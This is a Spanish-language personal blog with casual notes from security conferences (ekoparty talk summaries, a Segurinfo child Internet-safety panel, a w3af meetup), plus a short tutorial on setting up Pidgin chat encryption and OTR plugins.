bueno, llegó el 1º dia


llegué justo a las 9, cuando comenzaba a moverse la larga cola que se había hecho para la registración y ahi me encontré con Cris, que esta vez no le tocó ningún viaje para la fecha de la ekoparty, y al fin está acá presente!, también estaban los cissps, issa y demás conocidos, aparte de Victor y Fran

Pedram Amini - Mostrame la guita! Adventures in buying vulnerabilities. -
Have you ever wondered what goes on behind the scenes of vulnerability purchasing programs? What price ranges are offered on the white, grey and black markets? How various software vendors compare to one another on response? This talk will share insights, statistics and amusing anecdotes drawn from my experiences, research and history of the TippingPoint Zero Day Initiative vulnerability buying program.

Pedram Amini leads the DVLabs security research group at TippingPoint which is responsible for internal audits, reverse engineering and the Zero Day Initiative. He was a founder of the first commercial vulnerability buying program at iDefense in 2002, and also a founder of the Zero Day Initiative vulnerability buying program launched at TippingPoint in 2005. Find out more at http://dvlabs.tippingpoint.com/team/pamini
 
http://www.zerodayinitiative.com/ como se pagan o como se beneficia el que encuentra la vulnerabilidad!
las que van descubriendo se ponen acá

la remera, regalaban remeras con la inscripción!, me tocó una XXL, no importa, me la puse igual

http://nomorefreebugs.com/
una iniciativa que armó Pedram con Alex Sotirov y Charlie Miller

ranking de software peores
nombró 3 que reconocí
Trend server protect
ARC serve backup de CA
Open view node de HP

Mientras daba la charla, chateaba
mejor dicho, tenía la ventana de chat de google abierta y cada tanto le hablaban

taossa.com/archive/bh08sotirovowd.pdf
exploited using DEP bypass detallada ahi
esto hablaban por el google talk, sobre algo que habían encontrado en algo de MS ;-)

Aaron Portnoy
Gerardo Rucharte, son de su equipo

Antes de Tipping estuvo ->  Idefense, Wabi Sabi Labi, esta no existe más
ver algo aqui
http://www.techcrunch.com/tag/wslabi/

doc con la presentación, de google docs
http://bit.ly/eDqjn o acá

mucho google
;-)

Motorola RAZR bug

zealot (fanáticos?), muchos de apple en CanSec West 2008, Pwn2Own two-minute pwn

qué programas pagan mejor las vulnerabilidades, o encontrarles agujeros
cuales se pagan bien, o poco, digamos donde conviene buscar ;-)

vulnerabilidad en Qmail, es más cara, por ejemplo que en Mozilla


######### Coffee Break, el 1º
Acá le robaron la mac a Pedram Amini
abajo, en el lobby
Al 1º speaker, igual que en wikimania, lo sufrió el 1º orador
será porque al inicio con los nervios del momento, el apuro y el aprendizaje, nos cagan siempre en el principio!

######### tipo 11:30
Deviant Ollam - Ten Things Everyone Should Know About Lockpicking & Physical Security -
Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network but that doesn’t make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how to best protect buildings and grounds from unauthorized access. Discussion as well as direct example will be used to demonstrate the grave failings of low-grade hardware... much of which will be opened by audience members with no prior training. What features to look for in locks and safes will be covered, and how to invest in systems that are easiest to manage in large environments will be discussed.

While paying the bills as a network engineer and security consultant, Deviant Ollam's first and strongest love has always been teaching. A member of the Board of Directors of the US division of TOOOL (The Open Organization of Lockpickers) Deviant runs the Lockpicking Village at DEFCON and ShmooCon every year and has conducted lockpick training sessions at Black Hat, ToorCon, HOPE, HackCon, ShakaCon, HackInTheBox, SecTor, CanSecWest, and the United States Military Academy at West Point.

Hizo varias demostraciones en la charla de abrir candados y cerraduras, y hasta se puso las esposas, y de espaldas....
Mostró unos videos, de uno que se puso las esposas de espalda, un flaco ya conocido en Las Vegas, y tan flexible que saltó sobre sus brazos y se las sacó pero viendo, de adelante
;-)
habló de gringo warrior
Y habló de que va a estar en DeepSec en Austria en noviembre


######### Break, no me acuerdo si hubo

Turbo Talks charlas cortas, como de 45 '

##########
Nicolás Waisman - Abusando Bitmask-
...y si solo podes escribir un byte o dos en el heap?
...y si tan solo, podes incrementar el contenido de una dirección?

Esta y otras preguntas más seran el objetivo de esta ponencia que buceará por los pantanos más oscuros de la Heap de Windows para sacar a luz una novedosa tecnica de explotación basada en el usufructo del bitmask.
Nicolas Waisman is a Senior Security Researcher and Regional Manager at Immunity, Inc, which he joined in 2004. Mr. Waisman is one of the driving forces behind the CANVAS attack framework. His security research is concentrated on win32 vulnerability development, specifically reliable heap exploitation techniques. Mr. Waisman has spoken on and taught these techniques to government and private sector researchers in Japan, Singapur, Europe, North and South America. Mr. Waisman is also the Manager and main point of contact for Immunity South America, where he is leading Immunity's newest project, the vuln-dev oriented Immunity Debugger.

################
Leandro Federico Meiners - WiFi Power save DoS -
Pero... mi estación está despierta Denegación de servicio basado en Power Save en redes Wi-Fi (IEEE 802.11) El estándar de redes inalámbricas IEEE 802.11 define un mecanismo de ahorro de energía (power save) que le permite a las estaciones entrar en un modo de bajo consumo, durante el cuál no pueden transmitir ni recibir datos. Presentamos un ataque de denegación de servicio basado en el mecanismo de ahorro de energía, cuyas características son una baja utilización de ancho de banda, y que permite puntualizar las estaciones a ser atacadas. Finalizamos presentando una mitigación que implica únicamente modificar los drivers de las estaciones, es backward compatible y demuestra ser efectivo contra el ataque.

Leandro Meiners es consultor de seguridad informática en CORE Security Technologies, y ha trabajado como consultor durante los últimos seis años (los últimos tres en CORE Security Technologies). Se ha especializado en penetration testing, tanto a nivel de red como de aplicación, y ha realizado trabajos para importantes firmas internacionales del sector público y privado.

#################
Almuerzo en el Abasto
lindas fotos del abasto
casi todos estaban por ahí, mesas grandes, de a poquitos, de todo.....
yo fui con Lore, moto, Sebastiań, Adrián y más gente que no recuerdo los nombres, sory....
todos a Mc Donalds, menos yo
;-)


Como se atrasó una hora todo, volvimos maso a las 15 hs
y hubo cambio de horarios de las charlas a la tarde, cambió el orden
:-)

###############
Nicolás Economou - Heuristicas aplicadas a la comparacion ( diffeo ) de binarios -
Esta charla va a girar entorno a una actividad muy comun en la actualidad, relacionada directamente con la seguridad informatica y con la posible deteccion de robo de codigo, la comparacion de binarios y generacion de exploits en base a parches de seguridad de los productos. Se explicaran con detalle las heuristicas aplicadas sobre el matcheo de funciones, deteccion de cambios y problemas en la implementacion, todo esto materializado sobre una tool (turbodiff).
* Se hara una demo donde se comparará cambios de seguridad sobre archivos binarios de Microsoft.
* Se hara una demo donde se comparará un cambio de seguridad en IPHONE.
* Se hará una demo donde, en base al diffeo de un parche de un server-demo, se deducirá cual es el bug y se atacará a este.
* Como ultimo, haría una demo que muestra que es factible encontrar codigo robado entre aplicaciones.
Turbodiff es el resultado de una investigacion independiente realizada por Nicolas A. Economou culminando con en el desarrollo de un plugin para IDA altamente performante que tiene la capacidad de comparar files binarios de distintas arquitecturas soportados por IDA como PowerPC, MIPS, ARM, x86, etc ...

Nicolas Economou had worked for the last 3 years as Exploit Writer at CORE Security Technologies writing exploits for multiple platforms including Mac OS X, Windows, Linux and IPhone. In his free time he enjoys creating tools (including disassemblers and debuggers) to help the reverse engineering process. Also is a fan of old cars :)

ACá les pongo un brief de turbodiff que escribió Mario

IDA : desensamblador de exe
muy buena tool, excelente

################ Break

Aca vemos una parte del escenario, de la máquina de War Games, muy buen trabajo JP!!!

y atrás se ve el DEFCON, los números que se usan para marcar el nivel de seguridad del estado

Normalmente estamos en DEFCON 5 y va bajando a medida que hay problemas de seguridad. En la peli de War games se ve, pero también en muchísimas......
Bourne, Independence day, de extraterrestres, de guerra o espionaje URSS-USA

Aquí, se usaba para marcar el tiempo de la charla para los speakers, y para la audiencia
Empezaba en 5 cuando empezaba la charla, y a medida que transcurría el tiempo iba bajando, hasta llegar a 1, que era la carita de ekoparty, y ya debía terminar, ya ya!!!

##################
Chema Alonso - Connection String Attacks -
Los sistemas de administración de bases de datos, los paneles de control que permiten la gestión de los motores e incluso aplicaciones webs de todo tipo, permiten la conexión a bases de datos. Esta sesión mostrará cuales son los riesgos de seguridad en aquellas aplicaciones que gestionen mal las credenciales.

Chema Alonso es Ingeniero Informático por la Universidad Rey Juan Carlos de Madrid dónde está terminando su tesis doctoral sobre seguridad en aplicaciones Web. Ha sido premiado con el título de Most Valuable Professional por Microsoft en el área de seguridad Informática desde el año 2004, distinción que a día de hoy, sólo tres personas tienen en España. Es escritor habitual en revistas tecnológicas sobre seguridad informática y ponente en conferencias nacionales como la Gira de Seguridad de Microsoft, Masters, el Technet Security Day o el Asegúr@IT además de participar en conferencias internacionales como Blackhat, Defcon, ToorCon o ShmooCon entre otras. Trabaja como consultor de seguridad en Informática 64 y escribe un blog sobre seguridad informática titulado "Un Informático en el lado del mal".

La primera vez que daba esta charla chema, la estrenó en bs as. Y a mí, y a otros con quien hablamos también les pareció cortita
;-)
chiste de que la compu le peta

################## Break

##################
Luis Miras - Attacking SMS -
With the increased usage of text messaging around the globe, SMS provides an ever widening attack surface on today's mobile phones. From over the air updates to rich content multimedia messages, SMS is no longer a simple service to deliver small text-only messages. In addition to its wide range of supported functionality, SMS is also one of the only mobile phone attack surfaces which is on by default and requires almost no user interaction to be attacked.

Luis Miras is an independent security researcher. He has worked for both security product vendors and leading consulting firms. His interests include vulnerability research, binary analysis, and hardware/software reverse engineering. In the past he has worked in digital design, and embedded programming. He has presented at CanSecWest, Black Hat, CCC Congress, XCon, REcon, Defcon, and other conferences world-wide. Recently Luis co-authored "Reverse Engineering Code with IDA Pro" (Syngress/2008).


taftapp -> USA
será esta?
http://it.toolbox.com/blogs/securitymonkey/live-blog-blackhat-2009-day-2-33168

MMS parecido a SMS

3 grupos de personas saben lo que pasa
* sw
* aparato
* compañia telefónica


############### Break

Leonardo Nve - Playing in a Satellite environment 1.2 -
This presentation is a warning call to those responsible for the companies that use or provide data connection (especially the Internet) via satellite, proving some of the attacks that are possible in this environment.
The attendees will learn how insecure satellite connections are and why they need a more secure platform for this environment or how we must use secured protocols if we have this tecnology hired.
Also, they will learn how these attacks can be made, including how to get an anonymous satellite connection.
Previously satellite presentations exists, but these are focused only in feeds capturing and a bit in sniffing data, treating this as a passive vulnerability. I focused my presentation in the active attacks someone can make to the clients and ISP.

Senior security auditor and trainer interested in computer security since 1996,working as consultant and auditor from 2000, 2002.
I managed several research on various security technologies such as DOCSIS and Wireless, with various papers published in various Spanish specialized publications. Also I managed the UnderCON, the first Spanish underground security congress, where I presented the first full-ASCII Shellcode in 2000, other talks was about wifi and phone companies security.

Inmarsat
DVB digital terrestre
DVB digital vía satélite

muy fácil de hacer con:
+tarjeta skystar (pci-usb)
+linuxTV -> dvb_apps
+wireshark
+
+antena con LNB

él, Leo, lo tiene con fedora

En España esto, viejo se consigue por 50 euros
y esto es re actual
A nosotros nos parece re moderno
Allá en España, yo lo vi, cuando fui este mismo año, ya no se venden televisores analógicos, solo digital, en los negocios

Ahora que la tv es digital
cuando estuve, en no me acuerdo qué provincia se hacía el apagón analógico, creo Extremadura
en Navarra, iba a ser dentro de un tiempo, pobre tío Luis, él va a seguir con su viejo TV, le dijeron con un aparato decodificador lo solucionaba
por lo que leí investigando un poco este tema tan interesante, no hay pasaje de un DVB-T a DVB-S
y también me lo dijo el amigo Mikelats, saludos
;-)

por este motivo
en España se puso de moda piratear la tv por satelite
iba cifrada y la rompieron

Norma ITU

satfinders: busca satélites para apuntar la antena, porque necesito datos
Usa esta herramienta para buscar satélites

szap linux tools, es una dvb_apps
necesito saber la configuración del transponder
el software, por ejemplo dvb-utils usa el archivo channels.conf

dvbsnoop busca PIDs

dvbsnoop [-s mode] [options] pid

pid se refiere a Packet ID, no al número de proceso o pid que ya conocemos ;-)


dvbsnoop -s pidscan

-s pidscan Scan PIDs on transponder/frequency.

dela pagina man de dvbsnoop

GRE protocolo para encapsular IP sobre IP
lo vimos en redes IP GRE
se usa para armar una red local

ver cabecera del paquete GRE, buscarla, para entender como se ataca con phenoelit

ASRL, qué es?
varios lo nombraron en sus charlas
un device?
un protocolo nuevo?
?????????????????????????????????????????????????????????

##################################

Lockpicking - Wargames-------------------> todo el tiempo


Nos fuimos como a las 9
yo no sé como caí con unos chicos de Mar del Plata, que conocían a los chicos de la eko desde hace años
a la salida, que me llevaron a Roots
llovía, y ellos estaban con auto
pensé que eran conocidos de Ariel, el chico de Arizona (que estuvo en wikimania)

##########################
GetTogether (Afterhour)

Sheraton
Jueves 19 Marzo 2009
Segurinfo
http://www.segurinfo.org.ar/


Esta vez, me tocó ir como disertante, asi que mis nervios y la situación, hicieron que no vaya a muchas charlas, hasta que pasara la nuestra
que era la 3º en el orden, a las 11:50 hs
Aquí el programa

y esta nuestra charla
11:50 Experiencias de concientización en escuelas. Riesgos del uso de Internet  Les voy a hablar de lo que nos pasa, lo que vivimos cuando vamos a las escuelas a dar la charla
yo estaba en el panel como oradora, que da la charla en la escuela, y presentaba mis experiencias, cosas que nos pasaron, la expectativa, el clima que había, como cambiaba con el transcurso de la charla a  medida que entrábamos en confianza
y lo principal, para nosotros, relevar información, o sea, ver qué preguntan los padres, qué dudas específicas tienen, sobre todo por lo que ven en sus chicos. Esto nos da info para agregar en las charlas, o cambiar algunas cosas.
La premisa que ponemos al comenzar es que nos pregunten todo lo que quieran, lo que no entiendan, que se animen, e interrumpan cuando lo necesiten, no hay ningún problema, para eso estamos allí.
La charla debe ser dinámica e interactiva
Nosotros llevamos un set de diapositivas, que es la base, pero según como se va desarrollando la charla, se va cmabiando sobre la marcha, o se muestran imágenes o videos alusivos a lo que se está hablando
Al principio la gente está callada, escucha con atención y no se animan a preguntar.
Acá vamos a hacer una aclaración
hay 3 tipos de charlas, según sea el público escuchante
1- Para padres
2- Para chicos
3- Para padres con los chicos

1- Son las que más dimos, generalmente viene muy poca gente. Eso no importa, mejor dicho, sí importa, sería mejor que vengan todos, pero no importa en el sentido que la damos igual
Es difícil encontrar un horario que les venga bien a todos. A veces decimos de hacerlo a la noche, en horario post laboral, pero mucha gente despues del trabajo, hace otra actividad o está muy cansada y no tiene ganas, aunque todos sabemos que la prioridad de los padres son los hijos....es así?
Entonces decidimos aprovechar la mañana, hacer una charla corta cuando los padres llegan a la escuela a dejar a sus hijos. Una charla corta aunque más no sea, dejarles picando la idea, al exponerle algunos peligros o riesgos principales. Y muchas veces esta charla corta de media hora, se alarga y nos alegramos mucho, es el objetivo, que pregunten, que hablen y compartan sus experiencias.
Muchos padres, por culpa de la inseguridad que hay en la calle, no quieren que sus hijos salgan y dicen muy tranquilas y contentas:
"Estoy muy traquila, mi nena está en casa con internet!"
Les preguntamos si saben qué hacen, y lo que más contestan es: juegan, chatean con los amigos, se pasan fotos, a veces les muestran a los papás.

2- Las charlas para los chicos, que también depende del rango etario del grupo, son delicadas. A veces hablan, a veces no. Si habla uno, a veces compiten y cuentan los demás. Tenemos que hablar en su lenguaje y sus códigos, que a mi no me cuesta nada (jaja) siendo muy distinto de la charla para adultos (mmmm ya soy adulto ;-) )
Una idea y/o pedido es capacitar al cuerpo docente, no solo los de informática para que tiren algunos tips en sus clases

3- Estas son las más dinámicas, divertidas, productivas, esclarecedoras y sanadoras ;-)
Para los que hablamos, y sobre todo para los que escuchan, ya que los padres escuchan de boca de sus propios hijos qué hacen....
Nosotros vamos dando ejemplos de cosas que hacemos por internet, hablamos de MSN, de twitter, de fotologs, etc, etc
Ejemplo: contamos casos de chats donde una persona se hace pasar por otra y preguntamos "a alguno le pasó?"
y un chico, dice "sí, a mí me pasó". Después se anima otro y da más detalles de como le fue a él.
Eso nos sirve, para que los padres se enteren y vean lo que pasa
Nosotros extendemos el ejemplo, a algo más grave, donde la identidad del personaje del chat es un mayor que se hace pasar por un amiguito de su edad y quiere obtener algo del chico/adolescente.
Los padres se asombran de algunas frases nuestras y de algunas que escuchan de sus hijos.
A veces los padres no se enteran, o no se imaginan que por los chats cuando los chicos aceptan hablan con desconocidos
les piden fotos, sobre todo, fotos de las últimas vacaciones, para no pedirles directamente, fotos en malla o con poca ropa, para ver si después siguen accediendo a sus pedidos de fotos o de otras cosas, como encuentros.
Hay casos que a las nenas se les van de las manos y tiene miedo, el otro las amenaza que le va a contar a sus padres lo que hizo si no accede a su pedido. Y la nena según su personalidad, ingenuidad, falta de experiencia, falta de conocimiento de la tecnología, cree que es verdad que el pá puede enterarse y accede al pedido del delincuente o pedófilo.
grave
es el ciber acoso
así comienzan algunos casos de pedofilia

Antes les nombré "hablar con desconocidos"
Cuando nosotros eramos chicos, nuestros padres nos decían:
"No hables con extraños en la calle"
"No te subas a ningún auto"
"Que te abran la botella delante tuyo"
que antigüedad ;-)
Pero los peligros y los riesgos y los miedos son los mismos, los padres protegen a sus hijos, aconsejándolos
de nuevo, los riesgos, son los mismos, lo que cambió es el medio de comunicación
Pasa lo mismo que con los delitos informáticos, no son delitos informáticos, son delitos, pero cometidos con otros medios, los medios informáticos!
En este caso, es lo mismo, se usa internet como medio de comunicación, de contacto, para embaucar/engañar a los chicos.
Y así como antes nuestros padres nos aconsejaban, los padres de ahora no pueden aconsejar a sus chicos, no saben cuales son los peligros, no conocen los riesgos que puede haber, excepto que el papá se dedique a la informática y así poder hacer algo, como tocar el router para dar internet en determinada franja horaria por ejemplo, o conocer algunos programas que usa su hijo para traspasar los filtros, como proxys anónimos
En estos casos los padres no vivieron, no tiene experiencia como cuando nosotros eramos chicos y nuestros sí tenían la experiencia de vida para decirnos qué nos podía pasar.

ojo, no les decimos que no usen internet, o no chateen, no pueden quedarse afuera del mundo
y también hay otro riesgo, si no los dejamos conectar, se irían a anvegar a otro lado, un cyber o la casa de otro amigo donde no haya nadie
Entonces que naveguen, chateen y jueguen
pero tener cuidado, estar atentos nosotros y ellos, los padres son los 1º educadores, el hogar es donde comienza la educación, la familia, a pesar que la familia también es distinta, no hay un núcelo como antes, sino varios.
Hay que involucrarse, hablarles, preguntarles, enterarnos de qué hacen
y no solo en internet, en su vida
vos papá, sabes cual es el color preferido de tu hija? si le tenes que regalar algo en su cumple....

Por las preguntas que nos hacen los papás, tenemos 2 grupos:
los que no saben nada de qué hacen o qué pueden hacer
y los que se dieron cuenta, o pescaron algo y comenzaron a preocuparse, quieren enterarse de algunos términos, y del alcance de algunos juegos, o quieren controlar un poco las tareas porque vieron o escucharon algo que les dio un alerta y a veces, miedo!!
Por ejemplo, nos preguntan:
"Cómo hago para saber cuántos amigos tiene en facebook?
porque escuche que el decía a la amiga, te gané, yo tengo 456"
y les preguntan si los conoce a todos y las chicas le dicen que sí
hasta está cambiando la forma de "conocer", la definición de "conocer", un nuevo paradigma de "conocerse", por medio de una red, es amigo de amigo de amigo....eso es conocer.
Otros padres preguntan como entrar a ver los historiales del messenger, si la sesión tiene clave, por ejemplo

y como siempre, este problema quizá revela un problema más de fondo, de familia
de hablar en familia, de ocultar cosas
siempre debe mantenerse la privacidad, pero hay que hablar y saber, también depende de la edad y el sexo, si es varón o nena y si tiene 9 años o 14....
por ejemplo, los varones de 13, 14 años están mucho tiempo en juegos online
y las nenas de la misma edad subiendo fotos a facebook, despues que salió la noticia que las agencias de modelos buscan chicas por ahi

que final!!
cuál es la conclusión?
la escuela es donde se puede nuclear a la familia, a los chicos y a sus padres
están lo educadores
a ellos, a toda la comunidad de la escuela hay que capacitar, mostrar y enseñarles los riesgos que hay
involucrarse, meterse, eso es lo que tenemos que lograr
y si es de a poco
no importa, como decimos siempre, hay que dar el paso
y una frase que citó una de las 2 profes del Belgrano Day School, de Martin Luther King
Aunque me dijeran que mañana se desintegrará el mundo, yo igual plantaría mi árbol
Propaganda de wikimedia, citas aquí


Y como dijo mi amigo, el "padre" Ariel, después......
Esta es una conferencia de seguridad, donde se habla de cuidar los activos de la empresa, los recursos, etc, etc
Cuál es nuestro activo más importante?
Hacemos una matriz de riesgos?

Muy bueno como conclusión

Y algo para destacar, la última persona que habló del panel, pobre, se quedó sin tiempo, perdón
:-(
Osvaldo Marinetti del gobierno de Neuquén
mostró algo que nos parece increible a los que vivimos en Bs As, él dijo que allá no tienen este problema, los chicos, peligros de navegar por internet.....porque no tienen internet
Solamente hay 2 proveedores de internet, las escuelas es muy raro que tengan internet (justamente uno de los problemas que nos hace hacer la wikipedia en CD, asi los chicos pueden usar la enciclopedia)
hay internet, en el sur, por el turismo, y en una región pequeña del norte....
menos mal que tiene página web la provincia, fui a la presentación de gobierno electrónico :-)
como decimos.........la brecha digital
:-)
vamos!!!!

veamos alguna forma de cuidar mi chat y que no me vean lo que estoy hablando

Existen plugins para cifrar lo que entra y sale de mi conexión. Por suerte, sino sería un lío hacerlo a mano, a mi no me importaría, peros seguro que a mis contactos menos 1, sí!!

Tenemos que bajar algunos plugins para pidgin o gaim, que es la versión anterior de pidgin

(hacer click en las imágenes para ver más grande lo que se dice y muestra)


pidgin-encryption - Complemento de Pidgin que proporciona un cifrado transparente

Si tenés gaim, en vez de pidgin,
gaim-encryption - gaim plugin that provides transparent encryption - transitional

Es diferente paquete deb, pero la misma página web ;-)
Aquí explica un poco la historia de porqué el cambio, problemas de negocios

El plugin se instala, está debianizado,

alakran-LX:~# apt-get install pidgin-encryption

y después se activa en el programa
Herramientas->Complementos
y ahí debería aparecer


Abriendo sesión
ves que se ve un solo candadito?
porque el otro aún no me ha contestado que acepta mi clave y me envía la suya. El otro también tiene instalado el mismo plugin
Si está el candadito verde, quiere decir que está habilitado el cifrado, y tengo un canal seguro, puedo hablar
Sino, está en gris, y con botón derecho le doy Enable Encryption

Cuando el otro contesta, y ya se hizo el intercambio de claves (que puede ser por sesión, o quedar guardada en la máquina), aparecen los 2 candaditos verdes. Ver imagen inferior







Acá vemos que pasó cuando uno cierra la ventana, o la sesión, muestra el cifrado


Igual, está corroborado con wireshark, en la trama se ve que va cifrado.
Se los debo, tengo que cortar la trama con el gimp, y da trabajo seleccionarlo, sorry :-(







cuando cerras la sesion y se vuelve a abrir, tira este alerta











pidgin-otr- Off-the-Record Messaging plugin for pidgin
*Que lo que tiene de bueno que agrega repudiabilidad, o sea, después que el mensaje salió, puede ser de cualquiera, yo puedo rechazarlo...
*También ofrece secreto perfecto.
Como dijo Claude Shannon  que definió secreto perfecto: el texto cifrado no proporciona absolutamente ninguna información acerca del texto en claro. Por tanto, la probabilidad a priori de un mensaje en claro M es igual que la probabilidad a posteriori de un mensaje en claro M dado el correspondiente texto cifrado. Y de hecho todos los textos en claro son igualmente probables. Esto es una poderosa noción de dificultad criptoanalítica.^[3
(sacado de la wikipedia)

-- Aclaracion de Luc, debe ser error MIO de traduccion al español, no ofrece secreto perfecto, sino
PFS.
Parecido, pero no es lo mismo. No va por el lado de shannon.
-- Fin Aclaración!!

*O sea, ofrece Perfect  Forward Secrecy, que no es lo mismo!!

*y otra, se comunica con cualquier otro mensajero instantáneo.

En cambio pidgin-encryption, solo con pidgin. Si hablo con alguien que usa windows, puede instalar el pidgin en su windows ;-)
De a poco lo llevo al lado del bien!!!! vamos todavía!!!!
;-)



que será esto?
telepathy-haze - A telepathy connection manager that use libpurple
es un modo psíquico, mmmmmmm
pero en realidad es una mezcla, un administrador de varios mensajeros instantáneos

 

Ayer, jueves 27 fue la w3af meeting


Para quien no conoce w3af            
http://w3af.sourceforge.net/



Me vino Lu a buscar al trabajo

Hicimos tiempo en el bar de Tacuarí 1744

él estudiaba cripto2 y yo le recordé como fue mi examen

no confiarse mucho en las preguntas....

le conté de mi ataque animal y hablando de probabilidades, llegamos a la química.

siempre “filosofamos” con Luciano, o al menos nos salen charlas interesantes, filosóficas, antropológicas, ?????
una cosa cada mente la engacha con otra y termina siendo un paseo por varios temas

Es increible el link que tiene cada uno, y querías contar algo, sobre como fue que me mordió un perro y terminaste hablando del código de los RSS
y la magia de la química......
él me explicó que los RSS no son magia, es código XML
y yo le dije que la química tampoco, por algo el H2 forma el agua, no es magia, hay atracción de electrones, y cosas del estilo  entre átomos y moléculas

lo que sí es magia, es:
como se formaron, por qué existe el H2, el O2, el N2, etc, etc
o sea.....
como se formó la tierra, la vida....
;-)

pasamos por  la teoría de cuerdas, criptonomicón, Schneier
Hablando de la teoría de cuerdas, había un argentino que ganó un premio
y hablamos de El universo elegante

 

Mientras buscábamos lugar para estacionar, encontramos una librería buena, aparte de la que está sobre Ayacucho que ya conocía,
una sobre Lavalle, que siempre veo desde el colectivo, donde había 2 libros de universos paralelos, cúantica y arquitecturas y estilo. Voy a ir/entrar.

 

Llegamos a Roots como a las 8, justo con Riancho

Ya estaban Ezequiel y Facundo, conocidos de pyAR, Martín, taky y el amigo FedeK sirviendo las mesas, porque el bar estaba a full, reventaba de gente!

Más tarde llegó Buanzo, y me recordó que el viernes que viene es la 2600, que vaya, pero creo que no puedo.

que él organiza hace 8 años, los de La Plata se reúnen gracias a estas reuniones...mmmm

bue, me gusta saber la historia, y justo encontré al que sabía toda la historia ;-)

me preguntó por vampii, pero no vino

temas
el primer viaje a conferencias de riancho, fue a Finlandia
y en inglés
hablamos de las charlas en idiomas distintos
Salió el tema por las charlas de la ekoparty, que fueron en inglés y en español y no había traducción
 

nikto, licencia de mierda
ahí en la página web, dice que es GPL

Hay varias en w3af
basta con hacer un grep -r  ".copyright"


También salió la idea de hacer un hacketon
un domingo, por ejemplo


Facundo contó el significado de su tatuaje, en su dedo, un anillo de casamiento con forma de escudo

gran significado, que no lo pongo porque no escuché completa la siginificación, y en su blog está!

se casó hace 1 mes y medio

y entre cosas salió el tema, se dedican a criar bichos canasto

Y me volvió el tiempo atrás, juntando y revisando bichos canasta, cuando eramos chicas

en villa gesell, o en cualquier bosque de la patagonia, como seguíamos la evolución del bicho canasto, todo el tiempo que estábamos en el camping

se convierten en mariposas

Compran esas cajas de plástico transparente, que venden en Carrefour
para verlos bien
los intercambian cuando empiezan a salir de los canastos.

El canasto lo hacen solos, así como la araña fabrica la seda para hacer su telaraña, esta larva con su baba y elementos externos, como ramitas, tierra, y cosas que le ayuden a armar su infraestructura, hacen el canasto, su casita.
algo así, es la crisálida

Nos invitó a Los Cocos, que hermoso lugar, en Córdoba, para el 21, 22 y 23 de marzo, de 2009 ya que el 24 martes es feriado

y a la  de py_ar nacional pero todavía no está definida la fecha, pero no quiere interferir ni con wikimania ni con cafeconf

Entre ellos, Andrés y Facundo, está el 80% de código,

salió el tema, bue, en realidad lo sacó Andrés de:

chema chanta

le decía a Lu, "no sé si es tu amigo, pero para mi, es un chanta"

jjaja, yo también me sentí tocada, re-tocada, pero me la aguanté bien

y me callé la boca

es lo mejor, es discutir al pedo

sobre gustos y puntos de vista no hay uniformidad de criterios

y yo, como me dice Riancho, soy la grupie de chema
 

se habló de qué clase de tesis doctoral está haciendo
 

doctorado que no es de computabilidad o matemática, sino de sqlinjection a ciegas.....mmmmm
 

pero bue, si consiguió un director de tesis!
 

preguntaron en que universidad

upm, la politécnica de Madrid

ahí solo intervine, aclarándoles que en España hay como 300 doctores en el tema, nada que ver con Argentina o cualquier país de Sudamérica, excepto Brasil, que tiene como 30 maso
 

que no es serio
 

si sabe o no
 

ay chemita, como conseguis lo que querés, que hablen de vos

obviamente, como showman, y personaje no hay con qué darte

Contaba Lu, para los que no lo conocían, se disfraza y todo

se disfraza de Batman para matar pingüinos, tal cual, el personaje de comic, Batman y su villano, El Pingüino
http://www.youtube.com/watch?v=T2oiGzDL_qo
 

y alguno dijo, a él hay que tirarle con pingüinitos de plomo
 

y otro dijo, y ponerle una puntas, como agujas que se le claven
 

jaja chema, seguí metiéndote con los pingüinos, te vamos a destruir, esto lo digo yo!
 

es el pettinato de allá, dijo Luc
 

si tiene mucho ego
 

jajja, otra risa

en la mesa que estábamos había más ego!!!!!!

todos tenemos ego en esta mesa

Como si estuviera mal

si te mostras, si querés mostrar lo que haces

si queres que todos te saluden

que te reconozcan

si haces cosas para ayudar a los demás, también tenés ego

es natural

lo malo es la envidia

:-)

Después de varias cervezas,  mezclé con la negra que tomaba Buanzo, y ahí me pegó
Igual, nadie se dio cuenta
;-)
Fui caminando bien derechita sobre mis 2 patas al baño....se notó?


bueno, este es mi resumen, lo que recuerdo de esa noche...
;-)
y lo que escuché, yo, en diferentes partes y sectores de las charlas
me perdí partes, quiza lo transcribí mal
por eso, lo que dice acá, es exclusiva responsabilidad mía!
;-)
 

Jueves 19 hs - EST - Cabildo 15             (lástima el flash.......)
Llegué justo, para el comienzo
Me senté adelante de todo, me encontré con compañeros del postgrado, Ale, ya volvió de Milán

Castro agradeció que haya tantos egresados de la carrera.

uff, a ver cuando termino la tesis

La charla era de seguridad en general, lo que se viene hablando últimamente, lo que ahora se usa
ya no es un hacker que entra en mi pc, sino una mafia....

la ETA, el cartel de Medellin, Al Qaeda, etc, etc

Ellos reclutan aprendices de hackers, o mayores

Valerie Mc Niven, de la oficina del tesoro de los Estados Unidos, dijo que el cibercrimen mueve más plata que el narcotráfico

La típica y antigua idea, que para mí no es antigua, y para Jorge tampoco, sigue siendo válida, que hablaba hace años Aldegani, de la guerra cibernética o cybercrime
o ataques terroristas pero informáticas, hackear una central eléctrica, y dejar a todos sin luz
o una central termonuclear, o contaminar el agua
todo, es una mezcla
en una guerra, como en el amor,  vale todo, como dice la frase no sé de quien

y es una mezcla de guerra biológica, bacteriológica, química, aparte de la guerra guerra de ataques y luchas con bombas y armas, de pistolas, AK-47 Kalashnikova, por dar un ejemplo....

no solo te atacan tu máquina, o un sitio, pueden joder un país
Pasó el año pasado en Estonia 2007, tirar un pais

El ataque a las torres gemelas, murió mucha gente, pero algunas empresas siguieron funcionando

Ejemplos
Se cae la empresa, se cae el techo y mata a todos, la empresa sigue funcionando, contratan becarios, etc, etc, les enseñan y hacen nuestro trabajo

se cae la empresa, pero los datos ahora, se pierden los datos, y chau. Se cae la empresa

al garete, varias veces lo dijo, será como decir, "se fue a la mierda"??


phishing, ahora aunque te pongan teclados que se mueven, te filman en video, como explicamos los pasos en este post (encontralo, esta por el principio)
y es para robarte

los ataques ahora son para robarte, para conseguir dinero para otras cosas!!

cuidado con los chicos que aprenden por internet, script kiddies

En España, hubo una explosión de doctores en Informática, ciencias de la Computación, hay muchísimos, no recuerdo el número exacto, puede ser 300?

acm españa
Ing en computación
ing de software
le avisaron por sms hoy que se aprobó

